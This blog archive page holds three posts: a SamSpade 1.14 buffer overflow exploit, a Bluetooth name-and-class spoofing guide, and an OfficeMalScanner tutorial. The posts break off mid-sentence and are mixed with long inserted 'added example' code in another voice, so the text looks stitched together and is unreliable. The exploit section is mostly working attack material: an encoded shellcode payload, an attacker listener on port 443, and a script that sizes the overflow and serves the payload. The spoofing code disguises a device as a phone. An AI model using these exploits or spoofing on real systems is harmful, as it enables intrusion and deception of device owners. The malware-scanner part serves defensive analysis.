
Posts

Showing posts from December, 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW
# Date: 10-12-2013
# Exploit Author: VISHAL MISHRA & NIDHI VERMA
# Vendor Homepage: http://www.samspade.org/
# Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html
# Version: 1.1.4 (beta)
# Tested on: WINDOWS XP(sp2)

TARGET:   windows xp(sp2)   ip: 192.168.117.129
ATTACKER: backtrack         ip: 192.168.117.131   PORT: 443

Payload:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhM
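The payload above is a long run of filler followed by shellcode, served to the client from a listener on the attacker's port 443. The part the excerpt does not show is how the length of that filler was chosen. The following is an added example (it is not the authors' exploit and claims nothing about SamSpade's internals): the standard cyclic-pattern method for sizing the filler, plus a builder that assembles `filler + shellcode` and a one-shot TCP listener in the style of the setup above. The crash value fed to `pattern_offset` is assumed to come from a debugger attached to the target; the hypothetical helper and function names are mine.

```python
"""Added example (not from the SamSpade post): size the 'AAAA...' filler
of a crash payload with a cyclic pattern, then serve filler + shellcode
from a listener as the attacker box does on port 443.

Assumptions (mine, not the post's): the vulnerable client connects to the
listener and reads one oversized response; the value that lands in EIP (or
the SEH handler) at the crash is read from a debugger on the target.
"""
import socket
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern 'Aa0Aa1Aa2...': every 4-byte window is
    unique for the first 20280 bytes, so a crash value maps to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(pattern, crash_value):
    """crash_value is either the 4-byte string seen in the register, or the
    register value as an int (e.g. EIP=0x41336141).  x86 is little-endian,
    so an int is packed '<I' to recover the byte order in memory.
    Returns -1 when the value is not part of the pattern."""
    if isinstance(crash_value, int):
        needle = struct.pack("<I", crash_value)
    else:
        needle = bytes(crash_value)
    return pattern.find(needle)


def build_payload(offset, shellcode, filler=b"A"):
    """filler bytes up to the controlled offset, then the shellcode."""
    return filler * offset + shellcode


def serve_once(payload, port=443, host="0.0.0.0"):
    """Wait for one client connection, send the payload, return the peer.
    Binding to 443 needs root; nothing is sent until a client connects."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            conn.sendall(payload)
        return peer


if __name__ == "__main__":
    # Round 1: serve the pattern, crash the client, note the register value.
    pattern = cyclic_pattern(1000)
    # Suppose the debugger showed EIP=0x41336141 (constructed value).
    offset = pattern_offset(pattern, 0x41336141)
    print("controlled offset:", offset)
    # Round 2: filler up to the offset, then the real shellcode (placeholder).
    payload = build_payload(offset, b"\xcc" * 4)
    print("payload:", payload)
```

The two rounds are the whole method: first serve `cyclic_pattern()` and read the register at the crash, then serve `build_payload()` with the resulting offset. Whatever must sit at the offset (a return address, a SEH pair) depends on the target and is not shown in the excerpt above, so it is not guessed here.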

Spoofing Bluetooth Device Information

Step 1: $ hciconfig
Like ifconfig and iwconfig, for Bluetooth we have hciconfig, which enumerates the Bluetooth interfaces in a system with a little information about each card, such as its MAC address, MTU and interface name.
(screenshot: output of hciconfig)

Step 2: $ hciconfig -a hci0
So now we know we have a Bluetooth interface card, hci0. It may be any of hci0, hci1, etc. As you can see in the output below, this Bluetooth device is using the OS hostname as its own name. We will change this so that nobody can learn anything about our Bluetooth device from its name.

Class is a 24-bit (6 hex digit) identifier for Bluetooth devices. The class tells which hardware class a Bluetooth device belongs to, e.g. 1) 0x78020c is the class of a Phone/Smart phone, 2) 0x6e0100 is the class of a Computer. We will now change the default class and name of our Bluetooth device.
(screenshot: output of hciconfig -a hci0)

Step 3: $ hciconfig -a hci0 features
This command will tell what features our card
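The class values quoted above are not opaque numbers: the 24-bit Class of Device packs a major class (bits 8-12), a minor class (bits 2-7) and service flags (bits 13-23), which is why 0x78020c reads as a smart phone and 0x6e0100 as a computer. The following is an added example, not code from the post: it decodes and builds such values and emits the hciconfig `name` and `class` subcommands (from BlueZ's hciconfig) that change what a scanner sees. The interface name, the spoofed name "Nokia" and the helper names are my assumptions.

```python
"""Added example (not from the post): decode/encode the 24-bit Bluetooth
Class of Device (CoD) and emit the hciconfig commands that spoof the
adapter's name and class.

CoD layout (Bluetooth Baseband assigned numbers):
  bits 0-1   format type (00)
  bits 2-7   minor device class
  bits 8-12  major device class
  bits 13-23 service class flags
"""
import subprocess

MAJOR = {0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
         0x03: "LAN/Network Access Point", 0x04: "Audio/Video",
         0x05: "Peripheral", 0x06: "Imaging", 0x07: "Wearable",
         0x08: "Toy", 0x09: "Health", 0x1f: "Uncategorized"}

MINOR_COMPUTER = {0: "Uncategorized", 1: "Desktop workstation", 2: "Server",
                  3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
                  6: "Wearable computer", 7: "Tablet"}

MINOR_PHONE = {0: "Uncategorized", 1: "Cellular", 2: "Cordless",
               3: "Smart phone", 4: "Wired modem / voice gateway",
               5: "Common ISDN access"}

SERVICE_BITS = {13: "Limited Discoverable Mode", 16: "Positioning",
                17: "Networking", 18: "Rendering", 19: "Capturing",
                20: "Object Transfer", 21: "Audio", 22: "Telephony",
                23: "Information"}


def decode_cod(cod):
    """Split a CoD into human-readable major/minor class and service flags."""
    minor_code = (cod >> 2) & 0x3f
    major_code = (cod >> 8) & 0x1f
    services = [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)]
    major = MAJOR.get(major_code, "Reserved (0x%02x)" % major_code)
    minor_table = {0x01: MINOR_COMPUTER, 0x02: MINOR_PHONE}.get(major_code, {})
    minor = minor_table.get(minor_code, "0x%02x" % minor_code)
    return {"major": major, "minor": minor, "services": services}


def encode_cod(major_code, minor_code, service_bits=()):
    """Build a CoD from its parts, rejecting values that do not fit."""
    if not 0 <= major_code <= 0x1f or not 0 <= minor_code <= 0x3f:
        raise ValueError("major class must fit 5 bits, minor class 6 bits")
    cod = (major_code << 8) | (minor_code << 2)
    for bit in service_bits:
        if bit not in SERVICE_BITS:
            raise ValueError("unknown service class bit %d" % bit)
        cod |= 1 << bit
    return cod


def spoof_commands(iface, name, cod):
    """hciconfig's 'name' and 'class' subcommands for the given adapter."""
    return [["hciconfig", iface, "name", name],
            ["hciconfig", iface, "class", "0x%06x" % cod]]


def apply_spoof(iface, name, cod):
    """Run the commands (needs root and an adapter that is up)."""
    for cmd in spoof_commands(iface, name, cod):
        subprocess.run(cmd, check=True)


if __name__ == "__main__":
    for value in (0x78020c, 0x6e0100):       # the two classes the post quotes
        print("0x%06x ->" % value, decode_cod(value))
    # Make a laptop's adapter advertise itself as a smart phone with the
    # usual phone services (Capturing, Object Transfer, Audio, Telephony).
    phone_cod = encode_cod(0x02, 3, (19, 20, 21, 22))
    for cmd in spoof_commands("hci0", "Nokia", phone_cod):   # assumed iface/name
        print(" ".join(cmd))
```

Pick the service bits to match the class you are imitating: a "phone" that advertises Networking and Rendering but no Telephony looks odd to anyone who decodes the value. On current BlueZ releases hciconfig is deprecated in favour of btmgmt, but the CoD layout is the same.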

OfficeMalScanner Tutorial

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+

Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir

Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found

If you use Ubuntu with Wine installed, type the following command in a terminal, "wine cmd.exe", to get a Windows command prompt from which you can run OfficeMalScanner.

OfficeMalScanner Output
OfficeMalScanner in Scan Mode
OfficeMalScann
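To make the "scan" and "brute" options above concrete, here is an added example of the same idea in Python; it is not OfficeMalScanner's code and implements only a small subset of its heuristics. Scan mode checks for the OLE2 compound-document header, two well-known x86 shellcode idioms (GetEIP via `call $+5; pop reg`, and reading the PEB through `fs:[30h]`) and plain embedded PE files; brute mode tries every single-byte XOR and ADD key and looks for the DOS-stub string of a PE file, which is the "encrypted stuff" the real tool hunts for. The sample document is constructed inline so the script runs offline; the function names are mine.

```python
"""Added example (not OfficeMalScanner's code): a minimal 'scan' and 'brute'
over a constructed Office-like blob.  OfficeMalScanner's own heuristic set is
larger; these are the best-known patterns, and brute mode here covers only
single-byte XOR and ADD keys."""
import re

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # [MS-CFB] header signature
DOS_STUB = b"This program cannot be run in DOS mode"

# x86 byte patterns commonly found in document-embedded shellcode.
HEURISTICS = {
    # E8 00000000 (call next instruction) followed by pop r32 (58..5F)
    "GetEIP (call $+5 / pop reg)": re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]"),
    # 64 A1 30000000 = mov eax, fs:[30h]  (PEB pointer, short form)
    "PEB access (mov eax, fs:[30h])": re.compile(rb"\x64\xa1\x30\x00\x00\x00"),
    # 64 8B /r 30000000 with mod=00 rm=101 = mov r32, fs:[30h]
    "PEB access (mov r32, fs:[30h])": re.compile(
        rb"\x64\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d]\x30\x00\x00\x00"),
}


def scan(data):
    """Return (description, offset) hits like OfficeMalScanner's scan mode.
    An unencrypted embedded PE is reported when 'MZ' is followed by the
    'PE\\0\\0' signature within the first 0x400 bytes."""
    hits = []
    if data.startswith(OLE_MAGIC):
        hits.append(("OLE2 compound document header", 0))
    for desc, pattern in HEURISTICS.items():
        for m in pattern.finditer(data):
            hits.append((desc, m.start()))
    for m in re.finditer(rb"MZ", data):
        if b"PE\x00\x00" in data[m.start():m.start() + 0x400]:
            hits.append(("embedded PE file", m.start()))
    return hits


def brute(data):
    """Brute-force mode: undo every single-byte XOR or ADD key (1..255) and
    look for the DOS stub string.  Returns (mode, key, offset) tuples."""
    found = []
    for key in range(1, 256):
        candidates = (("XOR", bytes(b ^ key for b in data)),
                      ("ADD", bytes((b - key) & 0xff for b in data)))
        for mode, buf in candidates:
            idx = buf.find(DOS_STUB)
            if idx != -1:
                found.append((mode, key, idx))
    return found


def xor_bytes(buf, key):
    return bytes(b ^ key for b in buf)


def fake_pe():
    """Constructed stand-in for a PE file: 'MZ', the DOS stub string and a
    'PE\\0\\0' signature inside the first 0x400 bytes.  Not a real binary."""
    return (b"MZ" + b"\x90" * 0x3e + DOS_STUB + b"\x00" * 0x80
            + b"PE\x00\x00" + b"\x00" * 0x40)


def sample_document():
    """Constructed sample: OLE header, filler, two shellcode idioms, then the
    fake PE XOR-encrypted with key 0x5a so only brute mode can find it."""
    return (OLE_MAGIC + b"\x00" * 0x200
            + b"\xe8\x00\x00\x00\x00\x5b"   # call $+5 ; pop ebx
            + b"\x90" * 16
            + b"\x64\xa1\x30\x00\x00\x00"   # mov eax, fs:[30h]
            + b"\x90" * 16
            + xor_bytes(fake_pe(), 0x5a))


if __name__ == "__main__":
    doc = sample_document()
    for desc, off in scan(doc):
        print("%-35s at offset 0x%x" % (desc, off))
    for mode, key, off in brute(doc):
        print("brute: %s key 0x%02x reveals DOS stub at 0x%x" % (mode, key, off))
```

Note what the two modes see differently: `scan` reports the header and the two shellcode idioms but no PE file, because the embedded executable is XOR-encrypted; `brute` recovers it with key 0x5a. That is exactly why the tool only enables "brute" together with "scan".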